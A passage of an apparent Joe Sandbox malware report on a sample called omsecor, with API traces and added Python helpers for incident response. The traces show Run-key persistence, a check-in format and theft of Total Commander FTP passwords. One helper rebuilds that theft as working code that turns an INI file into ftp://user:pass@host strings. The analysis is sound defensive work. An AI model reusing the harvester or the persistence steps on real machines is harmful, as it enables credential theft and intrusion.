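    """
    e_lfanew, nt = read_headers(image)
    nt = bytearray(nt)
    struct.pack_into("<I", nt, 8, new_timestamp)
    return image[:e_lfanew] + bytes(nt) + image[e_lfanew + NT_HEADERS32_SIZE:]
```

A 64-bit image has a 240-byte optional header (IMAGE_NT_HEADERS64 is 0x108 bytes), so a fixed 0xF8 read is a hint that the sample only expects to handle 32-bit targets, which matches the i386 code in the dump.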

                          APIs
                          • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                          • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                          • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                          • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                          • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                          • String ID: hOA
                          • API String ID: 1355009786-3485425990
                          • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                          • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountTick
                          • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                          • API String ID: 536389180-697497794
                          • Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                          • Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

                          Control-flow Graph

                          control_flow_graph 169 40a786-40a79a 170 40a7b3-40a7ea call 405511 call 4056f9 call 405529 169->170 171 40a79c 169->171 182 40a7f8-40a7fb call 4056f9 170->182 183 40a7ec-40a7f6 170->183 172 40a7a9 call 406d14 171->172 176 40a7ae-40a7b1 172->176 176->170 178 40a79e-40a7a3 Sleep 176->178 178->172 184 40a800-40a815 call 405529 182->184 183->184 188 40a823-40a826 call 4056f9 184->188 189 40a817-40a821 184->189 190 40a82b-40a846 call 405529 call 406cb5 188->190 189->190 196 40a854 call 4056f9 190->196 197 40a848-40a852 190->197 198 40a859-40a87e call 405529 call 4078cb call 40a718 196->198 197->198 206 40a880-40a892 call 40a744 198->206 209 40a894-40a899 Sleep 206->209 210 40a89f-40a8c5 call 406e69 206->210 209->210 213 40a8d2-40a8d5 210->213 214 40a8c7-40a8cc Sleep 210->214 215 40a8d7-40a8da 213->215 216 40a8dc-40a8df 213->216 214->213 215->216 217 40a8e1-40a8f8 GetProcessHeap HeapFree 215->217 216->206 216->217
                          APIs
                          • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                          • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                          • Sleep.KERNELBASE(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                          • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                          • API String ID: 3100629401-2436734164
                          • Opcode ID: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                          • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                          • Opcode Fuzzy Hash: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                          • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
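
Every API line in these traces has one shape: `Api.Module(arg,arg,...), ref: address`, with each argument printed as an 8-digit hex DWORD (`?` where the sandbox could not resolve it) and stale stack slots trailing after the real parameters. Reading the constants by hand is where mistakes creep in: 0x2710 and 0xEA60 above are 10 s and 60 s sleeps, 0xC0000000 on a CreateFileW is GENERIC_READ|GENERIC_WRITE, and 0x80000001 is HKEY_CURRENT_USER. The Python parser below is an added example, not a Joe Sandbox tool, that turns such lines into records and decodes the argument positions a reviewer checks most often. The four input lines are copied from traces on this page; the decoder covers only CreateFileW, Sleep and RegOpenKeyExW and passes every other API through by name.

```python
import re

# Four API trace lines copied from the traces on this page, in the report's own format.
TRACE_LINES = [
    "CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618",
    "Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899",
    "RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run,00000000,"
    "00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44",
    "_memset.LIBCMT ref: 00407800",
]

# Api.Module(args), ref: XXXXXXXX   -- the argument list is absent for CRT helpers such as _memset.
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)

HIVES = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def parse_trace_line(line):
    """Split one trace line into api, module, raw argument words and the call-site address."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError("not an API trace line: %r" % line)
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw is not None else []
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def hex_arg(args, index):
    """Decode an argument word as a hex DWORD; '?' and non-hex strings give None."""
    try:
        return int(args[index], 16)
    except (IndexError, ValueError):
        return None


def decode(entry):
    """Replace the raw words at well-known argument positions with their symbolic meaning."""
    api, args = entry["api"], entry["args"]
    if api == "CreateFileW":
        access = hex_arg(args, 1) or 0                      # dwDesiredAccess
        names = [name for bit, name in ACCESS.items() if access & bit]
        disposition = DISPOSITION.get(hex_arg(args, 4), "unknown")  # dwCreationDisposition
        return "CreateFileW: access=%s disposition=%s" % ("|".join(names) or hex(access), disposition)
    if api == "Sleep":
        ms = hex_arg(args, 0)                               # dwMilliseconds
        return "Sleep: %d ms" % ms if ms is not None else "Sleep: ?"
    if api == "RegOpenKeyExW":
        hive = HIVES.get(hex_arg(args, 0), "unknown hive")  # hKey
        return "RegOpenKeyExW: %s\\%s" % (hive, args[1] if len(args) > 1 else "?")
    return api


def summarize(lines):
    """Decode a list of trace lines in order, skipping lines that do not parse."""
    out = []
    for line in lines:
        try:
            out.append(decode(parse_trace_line(line)))
        except ValueError:
            continue
    return out
```

The trailing words after a call's real parameters (for example `0040AB30` and `0040B3E5` on the RegOpenKeyExW line) are return addresses and leftovers on the stack, which is why the decoder only looks at fixed positions at the front of the list.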

                          Control-flow Graph

                          control_flow_graph 218 40782a-40786f GetModuleFileNameW CreateFileW 219 407871-407886 GetFileTime CloseHandle 218->219 220 407888-40788e GetTickCount 218->220 221 4078b0-4078ca call 4057b5 219->221 222 407893-40789d call 40584d 220->222 227 4078a6-4078ae 222->227 228 40789f-4078a5 222->228 227->221 227->222 228->227
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                          • CloseHandle.KERNEL32(00000000), ref: 00407880
                          • GetTickCount.KERNEL32 ref: 00407888
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCountCreateHandleModuleNameTickTime
                          • String ID: UniqueNum
                          • API String ID: 1853814767-3816303966
                          • Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                          • Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

                          Control-flow Graph

                          control_flow_graph 229 407e2b-407e3b 230 407e3d-407e3f call 407cd7 229->230 231 407e4e-407e7c SetFilePointer ReadFile 229->231 236 407e44-407e4c 230->236 233 407eba 231->233 234 407e7e-407e82 231->234 235 407ebc-407ebe 233->235 234->233 237 407e84 234->237 236->231 236->233 238 407e86-407e8f 237->238 238->238 239 407e91-407ea7 call 405493 238->239 239->233 242 407ea9-407eb8 call 405511 239->242 242->235
                          APIs
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                          • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerRead
                          • String ID: UniqueNum$d$hOAd$x
                          • API String ID: 1528952607-1018652783
                          • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                          • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

                          Control-flow Graph

                          control_flow_graph 245 40ac20-40ac48 RegOpenKeyExW 246 40ac60-40ac76 RegOpenKeyExW 245->246 247 40ac4a-40ac55 call 4069c0 245->247 248 40ac78-40ac7a 246->248 249 40ac7c-40ac87 call 4069c0 246->249 253 40ac5a-40ac5e 247->253 251 40ac8e-40ac92 248->251 254 40ac8c-40ac8d 249->254 253->246 253->251 254->251
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                          • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          • API String ID: 3546245721-4228964922
                          • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                          • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                          APIs
                          • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharLower$CommandFileLineModuleName
                          • String ID: /nomove
                          • API String ID: 1338073227-1111986840
                          • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                          • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                          Control-flow Graph

                          control_flow_graph 268 407cd7-407cfe call 40d5b0 GetModuleFileNameW 271 407d00-407d0b call 406cf9 268->271 272 407d0d-407d15 GetCurrentDirectoryW 268->272 274 407d1b-407d31 call 4054ed 271->274 272->274 278 407d33-407d35 274->278 279 407d36-407d60 CreateFileW 274->279 278->279
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                          • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateCurrentDirectoryModuleName
                          • String ID: \merocz.xc6
                          • API String ID: 3818821825-505599559
                          • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                          • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

                          Control-flow Graph

                          control_flow_graph 280 407727-407751 call 40d5b0 GetModuleFileNameW 283 407753-40776b call 4075d4 280->283 284 40776d-40776e 280->284 289 4077e1-4077ea 283->289 286 407774-4077a0 ExpandEnvironmentStringsW call 4075d4 284->286 291 4077a2-4077a5 286->291 292 4077eb-4077ee 286->292 294 4077b7-4077ba 291->294 295 4077a7-4077b5 GetLastError 291->295 293 4077e0 292->293 293->289 296 4077d2-4077dc 294->296 297 4077bc-4077c8 GetLastError 294->297 298 4077ca call 40a786 295->298 296->286 300 4077de 296->300 297->298 301 4077cf 298->301 300->293 301->296
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                          • GetLastError.KERNEL32(00000004), ref: 004077A9
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                          • String ID:
                          • API String ID: 1536607067-0
                          • Opcode ID: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                          • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                          • Opcode Fuzzy Hash: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                          • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                          Control-flow Graph

                          control_flow_graph 302 4077f0-407829 call 40d530 CreateProcessW
                          APIs
                          • _memset.LIBCMT ref: 00407800
                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateProcess_memset
                          • String ID:
                          • API String ID: 1177741608-0
                          • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                          • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                          Control-flow Graph

                          control_flow_graph 312 4069c0-4069fc RegQueryValueExW RegCloseKey
                          APIs
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                          • RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                          • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                          Control-flow Graph

                          control_flow_graph 313 406d14-406d20 InternetAttemptConnect 314 406d22-406d25 313->314 315 406d26-406d41 InternetOpenW 313->315
                          APIs
                          • InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Internet$AttemptConnectOpen
                          • String ID:
                          • API String ID: 2984283330-0
                          • Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                          • Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
                          • Opcode Fuzzy Hash: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                          • Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8

                           APIs
                          • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                          • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                          • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfileString$AllocHeap
                          • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                          • API String ID: 2479592106-2015850556
                          • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                          • Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58
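
The strings and the GetPrivateProfileStringW sequence above describe an INI walk rather than registry access: the registry path only locates the Total Commander installation, the first GetPrivateProfileStringW call (NULL section, NULL key, 0xFFFF-byte buffer) enumerates section names, the two StrStrIW calls filter those names, and the three calls with 0xFF-byte buffers read a connection's host, username and password, which are then formatted as ftp://%s:%s@%s. The Python example below is added here and is not taken from the sandbox output or from the sample. It models that walk over a constructed INI in the layout Total Commander uses for its FTP sites (wcx_ftp.ini, where [connections] lists the site names and each site has its own section); skipping sections whose names contain "connections" or "default" is an assumption drawn from the strings and the two StrStrIW calls. The sample reads the password value exactly as stored, so whatever is in that file is what leaves the host, and an incident responder should treat every entry it would produce as an exposed credential.

```python
import configparser

# Constructed sample input in the layout the report's strings imply (not a real user's file).
SAMPLE_WCX_FTP_INI = """\
[connections]
acme-backup=
staging=

[default]
pasv=1

[acme-backup]
host=ftp.example.test
username=backup
password=OBFUSCATEDVALUE01

[staging]
host=10.0.0.5:2121
username=deploy
password=OBFUSCATEDVALUE02
"""

# Assumed from the "connections"/"default" strings and the two StrStrIW calls: substring match,
# case-insensitive, like StrStrIW itself.
SKIP_SECTION_SUBSTRINGS = ("connections", "default")


def read_ini(text):
    """Parse INI text the way GetPrivateProfileString sees it: no % interpolation, keys case-folded."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    return parser


def is_connection_section(name):
    lowered = name.lower()
    return not any(s in lowered for s in SKIP_SECTION_SUBSTRINGS)


def harvest_ftp_urls(ini_text):
    """Return the ftp://user:pass@host strings the traced function would build from this INI."""
    parser = read_ini(ini_text)
    results = []
    for section in parser.sections():           # GetPrivateProfileStringW(NULL, NULL, ...) enumerates sections
        if not is_connection_section(section):
            continue
        host = parser.get(section, "host", fallback="")
        user = parser.get(section, "username", fallback="")
        password = parser.get(section, "password", fallback="")
        if not host:                            # a section with no host is not a usable site
            continue
        results.append("ftp://%s:%s@%s" % (user, password, host))
    return results


def exposed_accounts(ini_text):
    """What to put in the notification: host and user only, never the secret itself."""
    parser = read_ini(ini_text)
    return [(parser.get(s, "host", fallback=""), parser.get(s, "username", fallback=""))
            for s in parser.sections()
            if is_connection_section(s) and parser.get(s, "host", fallback="")]
```

On a real host the INI path would come from the registry value the function opens first; here it is replaced by the embedded text so the walk can be run offline.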

                           APIs
                            • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                            • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                          • GetSystemMetrics.USER32(00000000), ref: 004032E5
                          • GetSystemMetrics.USER32(00000001), ref: 004032ED
                          • VirtualProtect.KERNEL32(75A90B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                          • VirtualProtect.KERNEL32(75A90B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                          • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                          • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                          • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                          • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                          • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                          • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                          • API String ID: 3066332896-2664446222
                          • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                          • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                          • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                          • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                          Strings
                          Memory Dump Source
